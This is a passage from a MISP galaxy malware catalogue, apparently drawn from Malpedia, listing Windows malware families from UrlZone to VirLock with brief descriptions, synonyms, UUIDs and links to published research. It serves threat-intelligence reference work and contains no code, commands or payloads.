- https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone - webarchive
- https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/ - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf - webarchive
- https://mp.weixin.qq.com/s/NRytT94ne5gKN31CSLq6GA - webarchive
- http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0 - webarchive
- https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features - webarchive
- https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/ - webarchive
- https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html - webarchive
- https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware - webarchive
- https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much - webarchive
- https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations - webarchive
- https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan - webarchive
- https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Uroburos (Windows)
Uroburos is a driver for Windows, including a bypass of PatchGuard. According to Andrzej Dereszowski and Matthieu Kaczmarek, "the techniques used demonstrate [their] excellent knowledge of Windows kernel internals."
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Uroburos (Windows).
Known Synonyms |
---|
Snake |
Internal MISP references
UUID d674ffd2-1f27-403b-8fe9-b4af6e303e5c
which can be used as unique global reference for Uroburos (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos - webarchive
- https://research.nccgroup.com/2018/11/22/turla-png-dropper-is-back/ - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a - webarchive
- https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation - webarchive
- https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots - webarchive
- https://exatrack.com/public/Uroburos_EN.pdf - webarchive
- https://securelist.com/analysis/publications/65545/the-epic-turla-operation/ - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-hunter - webarchive
- https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken - webarchive
- https://www.circl.lu/pub/tr-25/ - webarchive
- https://artemonsecurity.com/snake_whitepaper.pdf - webarchive
- https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified - webarchive
- https://exatrack.com/public/Tricephalic_Hellkeeper.pdf - webarchive
- https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg - webarchive
- https://artemonsecurity.com/uroburos.pdf - webarchive
- https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf - webarchive
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/ - webarchive
- https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/ - webarchive
- https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
USBCulprit
According to Kaspersky, USBCulprit is a malware that is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.
Internal MISP references
UUID 56af8251-4236-42e0-99bc-2c32377e97bb
which can be used as unique global reference for USBCulprit
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.usbculprit - webarchive
- https://securelist.com/cycldek-bridging-the-air-gap/97157/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf - webarchive
- https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
USBferry
Internal MISP references
UUID 6d0a92c0-cad8-4470-b780-3041774acad3
which can be used as unique global reference for USBferry
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf - webarchive
- https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-troopers-back-usbferry-attack-targets-air-gapped-environments/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vadokrist
ESET reports that Vadokrist is a Latin American banking trojan that they have been tracking since 2018 and that is active almost exclusively in Brazil.
Internal MISP references
UUID d4ab5619-2347-4949-8102-78296b87a08c
which can be used as unique global reference for Vadokrist
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vaggen
Internal MISP references
UUID 006621d1-a3bd-40f2-a55c-d79c84879a6b
which can be used as unique global reference for Vaggen
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ValleyRAT
Internal MISP references
UUID fcf8f520-27a9-493e-a274-fbfd70b733b0
which can be used as unique global reference for ValleyRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.valley_rat - webarchive
- https://www.secrss.com/articles/52018 - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-latest-variant-valleyrat - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/chinese-malware-appears-earnest-across-cybercrime-threat-landscape - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VALUEVAULT
Internal MISP references
UUID dd95eefd-2ef3-4bda-9065-18f4b03c2249
which can be used as unique global reference for VALUEVAULT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.valuevault - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
- https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/ - webarchive
- https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
vanillarat
Description:
VanillaRat is an advanced remote administration tool coded in C#. VanillaRat uses the Telepathy TCP networking library, dnlib module reading and writing library, and Costura.Fody dll embedding library.
Features:
- Remote Desktop Viewer (With remote click)
- File Browser (Including downloading, drag and drop uploading, and file opening)
- Process Manager
- Computer Information
- Hardware Usage Information (CPU usage, disk usage, available ram)
- Message Box Sender
- Text To Speech
- Screen Locker
- Live Keylogger (Also shows current window)
- Website Opener
- Application Permission Raiser (Normal -> Admin)
- Clipboard Text (Copied text)
- Chat (Does not allow for client to close form)
- Audio Recorder (Microphone)
- Process Killer (Task manager, etc.)
- Remote Shell
- Startup
- Security Blacklist (Drag client into list if you don't want connection. Press del. key on client to remove from list)
Internal MISP references
UUID 5bb80b4a-d304-460a-bb07-417dea64f213
which can be used as unique global reference for vanillarat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VaporRage
According to Mandiant, VaporRage, or BOOMMIC, is a shellcode downloader written in C that communicates over HTTPS. Shellcode payloads are retrieved from a hardcoded C2 that uses an encoded host_id generated from the target's domain and account name. BOOMMIC XOR-decodes the downloaded shellcode payload in memory and executes it.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular VaporRage.
Known Synonyms |
---|
BOOMMIC |
Internal MISP references
UUID 5a76d7a1-486e-4f4e-9e23-e544ee9f2ef9
which can be used as unique global reference for VaporRage
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.vapor_rage - webarchive
- https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58 - webarchive
- https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf - webarchive
- https://www.incibe.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf - webarchive
- https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Varenyky
In May 2019, ESET researchers observed a spike in ESET telemetry data regarding malware targeting France. After further investigations, they identified malware that distributes various types of spam. One of them is leading to a survey that redirects to a dodgy smartphone promotion while the other is a sextortion campaign. The spam targets the users of Orange S.A., a French ISP.
Internal MISP references
UUID f0740430-248f-4dd9-a2f3-b2592090a8a6
which can be used as unique global reference for Varenyky
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vawtrak
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vawtrak.
Known Synonyms |
---|
Catch |
NeverQuest |
grabnew |
Internal MISP references
UUID b662c253-5c87-4ae6-a30e-541db0845f67
which can be used as unique global reference for Vawtrak
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak - webarchive
- https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest - webarchive
- https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/ - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf - webarchive
- https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/ - webarchive
- https://medium.com/@Ilandu/vawtrak-malware-824818c1837 - webarchive
- http://thehackernews.com/2017/01/neverquest-fbi-hacker.html - webarchive
- https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak - webarchive
- https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/ - webarchive
- https://www.secureworks.com/research/dyre-banking-trojan - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Veaty
Internal MISP references
UUID 25546977-de99-4c78-9322-0355cfcebcc8
which can be used as unique global reference for Veaty
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Veeam Dumper
Credential Stealer, written in .NET.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Veeam Dumper.
Known Synonyms |
---|
Eamfo |
Internal MISP references
UUID f85bbceb-dc51-4c11-93a6-21a72255dcaf
which can be used as unique global reference for Veeam Dumper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VegaLocker
Delphi-based ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular VegaLocker.
Known Synonyms |
---|
Buran |
Vega |
Internal MISP references
UUID 704bb00f-f558-4568-824c-847523700043
which can be used as unique global reference for VegaLocker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://twitter.com/malwrhunterteam/status/1095024267459284992 - webarchive
- https://twitter.com/malwrhunterteam/status/1093136163836174339 - webarchive
- https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618 - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VEILEDSIGNAL
Internal MISP references
UUID b75f0dfd-15df-439d-8ff0-8e8f87656565
which can be used as unique global reference for VEILEDSIGNAL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Velso
Ransomware that appears to require manual installation (believed to be via RDP). Encrypts files with the .velso extension.
Internal MISP references
UUID 5490d2c7-72db-42cf-a1a4-02be1b3ade5f
which can be used as unique global reference for Velso
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vendetta
Ransomware, which appears to be a rebranding of win.cuba.
Internal MISP references
UUID bd774e26-f558-444b-abe6-c75868374d5e
which can be used as unique global reference for Vendetta
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Venom RAT
Internal MISP references
UUID 2ce1f55e-ac43-4fcb-b647-ff5ae9c26b7c
which can be used as unique global reference for Venom RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.venom - webarchive
- https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html - webarchive
- https://github.com/jeFF0Falltrades/rat_king_parser - webarchive
- https://www.cybeseclabs.com/2020/05/07/venom-remote-administration-tool-from-venom-software/ - webarchive
- https://blog.malwarelab.pl/posts/venom/ - webarchive
- https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/ - webarchive
- https://axmahr.github.io/posts/asyncrat-detection/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VenomLNK
VenomLNK is the initial phase of the more_eggs malware-as-a-service. It is a poisoned .lnk file that depends on User Execution and points to LOLBINs (often cmd.exe) with additional obfuscated scripting options. This typically initiates WMI abuse and TerraLoader, which can load additional functionality through various plugins.
Internal MISP references
UUID dea1ff4f-bc6d-40c0-9d19-b60578ea1344
which can be used as unique global reference for VenomLNK
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.venom_lnk - webarchive
- https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware - webarchive
- https://www.esentire.com/web-native-pages/unmasking-venom-spider - webarchive
- https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/ - webarchive
- https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire - webarchive
- https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Venom Proxy
According to Cisco Talos, this is a reverse proxy socks5 server-client tool originally developed for penetration testers.
Internal MISP references
UUID cd2ba5b9-1bfd-41c9-acf2-259a991986c6
which can be used as unique global reference for Venom Proxy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Venus Locker
Internal MISP references
UUID 7a0137ad-df7a-4fae-8365-eb36cc7e60cd
which can be used as unique global reference for Venus Locker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vermilion Strike (Windows)
Internal MISP references
UUID f2db1f70-a284-42c1-9f5a-4b2f46dc8868
which can be used as unique global reference for Vermilion Strike (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vermin
Internal MISP references
UUID 2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1
which can be used as unique global reference for Vermin
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin - webarchive
- https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html - webarchive
- https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/ - webarchive
- https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vetta Loader
Vetta Loader is a persistent loader that spreads via infected USB drives. It downloads other components by leveraging legitimate hosting services. https://yoroi.company/wp-content/uploads/2023/12/202311-Vetta-Loader_Def-min.pdf
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vetta Loader.
Known Synonyms |
---|
BrokerLoader |
EMPTYSPACE |
Internal MISP references
UUID f5dafd8f-1003-4002-ae05-ecbaa3ba6817
which can be used as unique global reference for Vetta Loader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.vetta_loader - webarchive
- https://www.mandiant.com/resources/blog/unc4990-evolution-usb-malware - webarchive
- https://fortgale.com/blog/featured/nebula-broker-offensive-operations-italy/ - webarchive
- https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-EMPTYSPACE-with-Google-Security - webarchive
- https://yoroi.company/en/research/unveiling-vetta-loader-a-custom-loader-hitting-italy-and-spread-through-infected-usb-drives/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vflooder
Vflooder floods VirusTotal by endlessly submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services is negligible, but for researchers it can be a nuisance. Most versions are protected by VMProtect.
Internal MISP references
UUID 044849d3-d0de-4f78-b67d-bfbe8dd3a255
which can be used as unique global reference for Vflooder
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VHD Ransomware
Internal MISP references
UUID fb0ad46d-20b6-4e8c-b401-702197667272
which can be used as unique global reference for VHD Ransomware
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-hermit-kingdoms-ransomware-play.html - webarchive
- https://seguranca-informatica.pt/secrets-behind-the-lazaruss-vhd-ransomware/ - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html - webarchive
- https://twitter.com/GrujaRS/status/1241657443282825217 - webarchive
- https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VictoryGate
VictoryGate was the name of a cryptomining botnet that was disrupted by ESET researchers in April 2020. The malware itself was also referred to as VictoryGate. It was spotted in May 2019 and targeted mainly Latin American users, specifically in Peru (Criptonizando states that 90% of the botnet population resided there). Both public and private sectors were targeted. This cryptojacking malware was specialized in the Monero (XMR) cryptocurrency. VictoryGate shows very strong code overlap with win.orchard.
Internal MISP references
UUID 229cd7f6-2514-42b8-baa6-0c2a22cd5d9c
which can be used as unique global reference for VictoryGate
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.victorygate - webarchive
- https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam - webarchive
- https://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/ - webarchive
- https://criptonizando.com/35-mil-computadores-foram-infectados-na-america-latina-por-malware-que-minerava-monero/ - webarchive
- https://www.eset.com/int/about/newsroom/press-releases/research/eset-researchers-disrupt-cryptomining-botnet-victorygate/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vidar
Vidar is a forked malware based on Arkei. This stealer appears to be one of the first to grab information on 2FA software and the Tor Browser.
Internal MISP references
UUID 1f44c08a-b427-4496-9d6d-909b6bf34b9b
which can be used as unique global reference for Vidar
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar - webarchive
- https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/ - webarchive
- https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign - webarchive
- https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed - webarchive
- https://threatpost.com/microsoft-help-files-vidar-malware/179078/ - webarchive
- https://censys.com/tracking-vidar-infrastructure/ - webarchive
- https://embee-research.ghost.io/ghidra-basics-identifying-and-decoding-encrypted-strings/ - webarchive
- https://www.secureworks.com/research/the-growing-threat-from-infostealers - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/ - webarchive
- https://blog.minerva-labs.com/vidar-stealer-evasion-arsenal - webarchive
- https://viuleeenz.github.io/posts/2023/10/vidar-payload-inspection-with-static-analysis/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/ - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- https://blog.jaalma.io/vidar-infostealer-analysis/ - webarchive
- https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468 - webarchive
- https://www.cynet.com/blog/cyops-lighthouse-vidar-stealer/ - webarchive
- https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware - webarchive
- https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/ - webarchive
- https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware - webarchive
- https://xer0xe9.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ - webarchive
- https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-vidar-2c0a62a73087 - webarchive
- https://asec.ahnlab.com/en/30875/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/ - webarchive
- https://isc.sans.edu/diary/rss/28468 - webarchive
- https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ - webarchive
- https://kienmanowar.wordpress.com/2022/12/17/quicknote-vidarstealer-analysis/ - webarchive
- https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/ - webarchive
- https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf - webarchive
- https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html - webarchive
- https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://ke-la.com/information-stealers-a-new-landscape/ - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader - webarchive
- https://censys.com/a-beginners-guide-to-hunting-open-directories/ - webarchive
- https://www.team-cymru.com/post/darth-vidar-the-dark-side-of-evolving-threat-infrastructure - webarchive
- https://www.youtube.com/watch?v=NI_Yw2t9zoo - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a - webarchive
- https://www.kroll.com/en/insights/publications/cyber/threat-actors-google-ads-deploy-vidar-stealer - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd - webarchive
- https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif - webarchive
- https://www.team-cymru.com/post/darth-vidar-the-aesir-strike-back - webarchive
- https://www.quorumcyber.com/wp-content/uploads/2023/01/Malware-Analysis-Vidar.pdf - webarchive
- https://www.zscaler.com/blogs/security-research/vidar-distributed-through-backdoored-windows-11-downloads-and-abusing - webarchive
- https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d - webarchive
- https://www.gatewatcher.com/lab/utilisation-de-faux-profils-steam-vidar-prend-les-commandes/ - webarchive
- https://xer0xe9.github.io/A-Case-of-Vidar-Infostealer-Part-2/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/ - webarchive
- https://darktrace.com/blog/vidar-info-stealer-malware-distributed-via-malvertising-on-google - webarchive
- https://cert.pl/en/posts/2021/10/vidar-campaign/ - webarchive
- https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem - webarchive
- https://asec.ahnlab.com/en/30445/ - webarchive
- https://asec.ahnlab.com/en/22932/ - webarchive
- https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ - webarchive
- https://community.emergingthreats.net/t/vidar-stealer-picks-up-steam/271 - webarchive
- https://intel471.com/blog/privateloader-malware - webarchive
- https://socprime.com/blog/somnia-malware-detection-uac-0118-aka-frwl-launches-cyber-attacks-against-organizations-in-ukraine-using-enhanced-malware-strains/ - webarchive
- https://www.csoonline.com/article/3654849/microsoft-help-files-repurposed-to-contain-vidar-malware-in-new-campaign.html - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vidar-malware-launcher-concealed-in-help-file/ - webarchive
- https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/ - webarchive
- https://twitter.com/GroupIB_GIB/status/1570821174736850945 - webarchive
- https://twitter.com/sisoma2/status/1409816282065743872 - webarchive
- https://www.youtube.com/watch?v=lxdlNOaHJQA - webarchive
- https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-vidar-stealer - webarchive
- https://eln0ty.github.io/malware%20analysis/vidar/ - webarchive
- https://m4lcode.github.io/malware%20analysis/vidar/ - webarchive
- https://insights.loaderinsight.agency/posts/vidar-build-id-correlation/ - webarchive
- https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://docs.google.com/spreadsheets/d/1nx42rdMdkCrvlmACDi3CHseyG87iSV1Y6rGZYq_-oDk - webarchive
- https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper - webarchive
- https://asec.ahnlab.com/ko/25837/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VIGILANT CLEANER
Wiper malware discovered by the Japanese security firm Mitsui Bussan Secure Directions (MBSD), which is assumed to target Japan, the host country of the 2021 Summer Olympics. In addition to targeting common Office-related file types, it specifically targets file types associated with the Japanese word processor Ichitaro.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular VIGILANT CLEANER.
Known Synonyms |
---|
VIGILANT CHECKER |
Internal MISP references
UUID 65711172-14f7-4e3d-9aca-7895b37b2e9a
which can be used as unique global reference for VIGILANT CLEANER
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner - webarchive
- https://www.mbsd.jp/research/20210721/blog/ - webarchive
- https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/ - webarchive
- https://www.fortinet.com/blog/threat-research/wiper-malware-riding-tokyo-olympic-games - webarchive
- https://therecord.media/wiper-malware-targeting-japanese-pcs-discovered-ahead-of-tokyo-olympics-opening/ - webarchive
- https://blog.trendmicro.co.jp/archives/28319 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Vilsa Stealer
Internal MISP references
UUID 86011ece-affa-4913-8674-a68096a77122
which can be used as unique global reference for Vilsa Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
virdetdoor
Internal MISP references
UUID 30161733-993f-4a1c-bcc5-7b4f1cd7d9e4
which can be used as unique global reference for virdetdoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VirLock
Polymorphic, parasitic file-infecting virus that transforms files into copies of itself. Additionally, it uses screen-locking as a ransomware technique.
Internal MISP references
UUID 86ea83f1-c06c-4ee3-9c4e-df302974f649
which can be used as unique global reference for VirLock
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.virlock - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-january-14-29-2017 - webarchive
- https://www.ciberseguridad.eus/sites/default/files/2022-04/bcsc-malware-virlock-tlpwhite_v1242.pdf - webarchive
- https://www.virusbulletin.com/virusbulletin/2016/12/vb2015-paper-its-file-infector-its-ransomware-its-virlock/ - webarchive
